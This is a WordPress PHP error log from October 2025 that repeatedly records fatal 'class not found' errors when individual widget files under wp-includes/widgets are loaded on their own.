[02-Oct-2025 14:08:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Oct-2025 14:08:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[02-Oct-2025 14:08:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[02-Oct-2025 14:08:15 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[02-Oct-2025 14:08:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[02-Oct-2025 14:08:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[02-Oct-2025 18:42:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Oct-2025 18:43:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[04-Oct-2025 00:11:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[04-Oct-2025 00:49:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[04-Oct-2025 04:59:17 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[04-Oct-2025 06:57:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[04-Oct-2025 08:31:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[04-Oct-2025 08:37:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[04-Oct-2025 13:50:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[04-Oct-2025 13:52:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[04-Oct-2025 13:56:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[04-Oct-2025 14:03:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[04-Oct-2025 14:18:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[04-Oct-2025 18:21:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[04-Oct-2025 21:26:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[05-Oct-2025 00:44:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[05-Oct-2025 01:10:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[05-Oct-2025 04:05:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[05-Oct-2025 04:20:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[05-Oct-2025 04:21:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[05-Oct-2025 04:31:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[05-Oct-2025 04:43:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[05-Oct-2025 08:45:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[05-Oct-2025 13:30:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[05-Oct-2025 13:54:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[05-Oct-2025 14:57:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[05-Oct-2025 16:02:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[06-Oct-2025 04:27:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[06-Oct-2025 04:59:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[06-Oct-2025 18:25:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[07-Oct-2025 00:58:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[07-Oct-2025 01:19:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[07-Oct-2025 02:49:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[07-Oct-2025 05:47:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[07-Oct-2025 07:52:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[07-Oct-2025 11:01:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[07-Oct-2025 11:23:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[07-Oct-2025 15:37:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[07-Oct-2025 16:30:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[07-Oct-2025 23:46:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[08-Oct-2025 02:14:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[08-Oct-2025 05:17:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[08-Oct-2025 07:32:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[08-Oct-2025 08:42:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[08-Oct-2025 11:16:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[08-Oct-2025 12:57:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[08-Oct-2025 13:44:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[08-Oct-2025 17:17:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[09-Oct-2025 03:26:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[09-Oct-2025 07:29:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[09-Oct-2025 13:30:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[09-Oct-2025 18:44:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[09-Oct-2025 21:36:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[10-Oct-2025 04:11:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[10-Oct-2025 05:42:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[10-Oct-2025 06:06:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[10-Oct-2025 08:12:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[10-Oct-2025 11:23:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[10-Oct-2025 13:59:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[10-Oct-2025 14:01:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[10-Oct-2025 16:04:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[10-Oct-2025 21:57:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[11-Oct-2025 06:17:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[11-Oct-2025 12:19:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[12-Oct-2025 00:22:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[12-Oct-2025 14:09:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[12-Oct-2025 18:06:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[12-Oct-2025 18:08:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[12-Oct-2025 18:11:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[12-Oct-2025 18:18:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[12-Oct-2025 18:30:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[13-Oct-2025 03:20:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[13-Oct-2025 05:26:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[13-Oct-2025 06:41:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[13-Oct-2025 06:43:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[13-Oct-2025 06:46:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[13-Oct-2025 06:51:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[13-Oct-2025 08:10:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[13-Oct-2025 10:50:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[13-Oct-2025 10:52:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[13-Oct-2025 10:55:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[13-Oct-2025 11:01:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[13-Oct-2025 11:12:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[13-Oct-2025 11:32:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[13-Oct-2025 12:06:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[13-Oct-2025 12:12:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[13-Oct-2025 12:28:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[13-Oct-2025 13:16:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[13-Oct-2025 17:29:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[13-Oct-2025 17:31:02 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[13-Oct-2025 17:35:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[13-Oct-2025 18:03:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
